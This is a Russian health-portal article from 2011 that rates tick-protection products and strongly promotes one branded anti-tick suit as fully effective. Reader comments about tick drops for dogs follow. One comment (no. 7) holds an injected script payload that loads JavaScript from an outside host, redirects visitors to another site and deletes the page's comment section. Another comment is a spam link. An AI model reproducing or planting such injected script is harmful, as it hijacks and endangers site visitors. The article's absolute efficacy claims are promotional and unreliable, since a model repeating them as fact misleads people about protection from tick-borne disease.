Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рейтинг средств защиты от...  >>  Рейтинг средств защиты от клещей
 
Обратная связь
 

Рейтинг средств защиты от клещей

Размер шрифта
21 июня 2011 11:38
  • google_analytics: false
  • Нравится

В 2011 году в Российской Федерации сохраняется напряженная эпидемиологическая ситуация по инфекциям, в распространении которых участвуют клещи. Поскольку вакцины от клещевых вирусов нет (исключая возбудителя клещевого энцефалита), ключевая роль в обеспечении безопасности россиян принадлежит средствам индивидуальной защиты от нападения опасных кровососущих.

Клещ 

В последнее время на российском рынке появилось много всевозможных лжепротивоклещевых средств. Пользуясь страхом людей перед возросшей опасностью заражения, нечистоплотные производители под видом противоэнцефалитных предлагают костюмы с лимонным запахом, одежду в виде кокона из тюля или кремы, которые как будто можно нанести на кожу и больше не волноваться. Более того, распространяются БАДы (биологически активные добавки), которые якобы излечивают от клещевого энцефалита.

Учитывая, как в таких обстоятельствах рискует человек, уверовавший, что он под надежной защитой, действия таких дельцов уже нельзя считать просто «лукавством» – это преступление. Не случайно Управление Федеральной антимонопольной службы по Нижегородской области в начале этого года привлекло к ответственности распространителей якобы противоэнцефалитных БАДов.

К сожалению, с противоклещевыми аэрозолями и одеждой дело обстоит сложнее. До этого года в России отсутствовали единые регламентирующие документы для средств индивидуальной защиты от клещей. То есть любая одежда могла позиционироваться как противоэнцефалитная и, тем самым, вводить людей в заблуждение относительно уровня защищенности их жизни и здоровья. Чтобы изменить ситуацию специалисты Роспотребнадзора и ведущие ученые-энтомологи разработали методику оценки эффективности противоклещевых средств.

Согласно данной методике, анализ эффективности проводится в несколько этапов по множеству параметров. В итоге рассчитывается коэффициент защитного действия (в %), длительность защитного действия (в днях или месяцах) и спектр защитного действия (от каких видов кровососущих защищает, в баллах) - объективные показатели, дающие точное представление об уровне защищенности человека. Только после такой экспертизы можно говорить о степени надежности того или иного средства.

Кроме того, одновременно проводится оценка токсичности (острой и хронической) каждого средства для человека и анализ потенциально опасных путей поступления вредных веществ в организм.

Специалисты ФГУН НИИ дезинфектологии Роспотребнадзора уже протестировали таким образом наиболее популярные в России защитные средства и поделились основными выводами:

  • Аэрозольные репеллентные (отпугивающие клещей) средства даже при соблюдении правил нанесения быстро теряют эффективность, особенно под действием ветра и дождя (уже через несколько часов). Поэтому требуются регулярные повторные обработки, при которых одежду необходимо снять (непосредственно на человеке проводить нельзя), что недопустимо в условиях леса.
  • Аэрозольные акарицидные (отравляющие клещей) средства могут обеспечить более длительную защиту, однако только при условии строгого соблюдения всех правил нанесения. При этом необходимо помнить о высокой токсичности действующего вещества, поэтому нельзя обрабатывать одежду на человеке, кроме того необходимо применять защиту органов дыхания.
  • Аэрозолей и кремов, которые могут защитить от нападения клещей при нанесении на кожу человека – НЕ СУЩЕСТВУЕТ! У клещей, чувствующих близость кровеносных сосудов, скорость присасывания возрастает настолько, что отравляющие вещества не успевают предотвратить укус.
  • В традиционных костюмах, называемых противоэнцефалитными, используется исключительно механическая защита, затрудняющая проникновение клеща к телу, но не обезвреживающая его. Сохраняется вероятность укуса как на природе, так и при возращении человека домой.
  • Протестированная импортная одежда, поставляемая в Россию, изготовлена из ткани с пропиткой, которая прежде чем отравить кровососущих, возбуждает их и повышает скорость присасывания. Учитывая, что данная пропитка действует на клеща только через 6-10 минут, ВЕРОЯТНОСТЬ УКУСА ОЧЕНЬ ВЕЛИКА!
  • Наилучший результат показала новейшая российская разработка ЗАО «ФПГ Энергоконтракт» – костюм «Биостоп», Биостопсозданный с применением особой технологии механических и химических ловушек. Имеющиеся в костюме вставки с пропиткой быстро парализуют клеща, который уже через 3-4 минуты отпадает с одежды и погибает. В настоящее время это единственное средство, коэффициент защитного действия которого в ходе экспертизы был признан равным 100%, а длительность действия – 3 года с учетом 50 стирок. В этом уже убедились работники энергетических, нефтяных, транспортных и лесозаготовительных компаний, а также сотни туристов - за 3 года среди них не было зафиксировано ни одного укуса. В настоящее время «Биостоп» является не только самым надежным и безопасным для человека средством защиты от всех заболеваний, распространяемых клещами, но и комфортным. Для данного противоклещевого костюма используется исключительно тонкая пряжа из длинноволокнистого хлопка, обеспечивающая ткани хорошие гигиенические показатели. КомарСложная структура плетения нитей, аналогичной той, которую используют при производстве дорогой одежды, в том числе из натурального шелка, обеспечивает максимально «дышащие» показатели, необходимые для активно работающих или отдыхающих на природе людей, и, особенно, для детей. Воздухопроницаемость такой ткани в 10 раз превосходит требования ГОСТа для летних изделий, а вес – почти в 2 раза меньше тех, что применяются для изготовления традиционных штормовок - 210 г/м2 против 350-400 г/м2. Тонкий и мягкий натуральный материал обеспечивает надежную защиту и от укусов комаров: хоботок насекомого не может проникнуть сквозь такое переплетение.Демонстрация ловушек

В будущем оценку эффективности по разработанной методике планируется сделать обязательной и проводить в аккредитованных лабораториях: во-первых, это побудит производителей к дальнейшему совершенствованию противоклещевых средств в плане повышения их эффективности и снижения токсичности; а, во-вторых, позволит избежать нарушения прав потребителей в части товаров, от которых зависит их здоровье и жизнь. Таким образом, на российском рынке будет обеспечен качественный контроль.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 апреля 2015 в 08:33

Цитировать   |   Пожаловаться

Ну с людьми понятно, как можно защитится от клещей, но надо же не забывать, что у многих есть братья наши меньшие. У нас к примеру две собаки, обе охотничьи, муж часто ходит с ними в лес. Так знаю каплями их обрабатывает в период клещей, по приходу из леса еще делаем осмотр, но как стал каплями обрабатывать ни одного еще не сняли. 

2 - Гость

16 апреля 2015 в 07:55

Цитировать   |   Пожаловаться

Спасибо за ваш отзыв, а вы где капли покупаете?

3 - Гость

23 апреля 2015 в 01:31

Цитировать   |   Пожаловаться

Гость вы знаете мы тоже своих собак, которых у нас целых три обрабатываем каплями  Очень хорошие капли. Защишают собак от клещей и блох хорошо. А покупаем эти капли в вет. аптеке, в которой всегда берем нужные препараты для наших питомцев. 

4 - Гость

24 апреля 2015 в 14:41

Цитировать   |   Пожаловаться

Дивная беседа. Обрабатываем каплями, каплями. А как капли то называются???

5 - Гость

02 мая 2015 в 23:50

Цитировать   |   Пожаловаться

Гость 24 апреля 2015 в 14:41
Дивная беседа. Обрабатываем каплями, каплями. А как капли то называются???
 Модераторы сайта видимо вырезают названия, типа чтоб не рекламировали препараты, будем другие сайты читать, где есть такая информация))) 

6 - Гость

09 мая 2015 в 10:38

Цитировать   |   Пожаловаться

Реклама костюма вобщем!Мне иногда кажется,что кто пишет такие статьи думает что он умный а все вокруг дураки.

7 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

8 - Гость

29 марта 2016 в 15:00

Цитировать   |   Пожаловаться

В прошлом году зашла в ближайшую ветеринарку, собиралась уже Адвокат капли купить. Хорошо что посмотрела на коробку, когда уже пробила чек - просрочено :(((. Они же тюбиками продают, а даты на коробке пробиты! Так бы купила и мазала... не понятно чем-бы обернулось! Проверяйте срок годности! В этот же день купила другие капли, мне их порекомендовали в магазине, решила попробовать и знаете результатом была удевлена.  Капли оказались отличными, реакции на них у нас не было, через два дня помыли после обработки и как будто вообще не обрабатывали, за то клещей не хватали вообще. У нас эффекта вектры хватает почти на 1 месяц, иногда можем на 2 дня раньше обработать если знаю что за этот месяц чаще мыла, чем обычно. Капли при том что хорошо защищают от клещей, еще также помогают в защите от блох, комаро, мух. Это из личного опыта!

9 - Гость

17 июня 2016 в 10:30

Цитировать   |   Пожаловаться

Спасибо за подробное описание. Я бы добавил, что животных тоже надо защищать. Они могут сами пострадать или быть просто переносчиками. Хотя,если отдыхать на даче, то лучше репеллентов - <a href="http://dezclean.ru/index.php/kleshchi">обработка участка от клещей</a>.

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.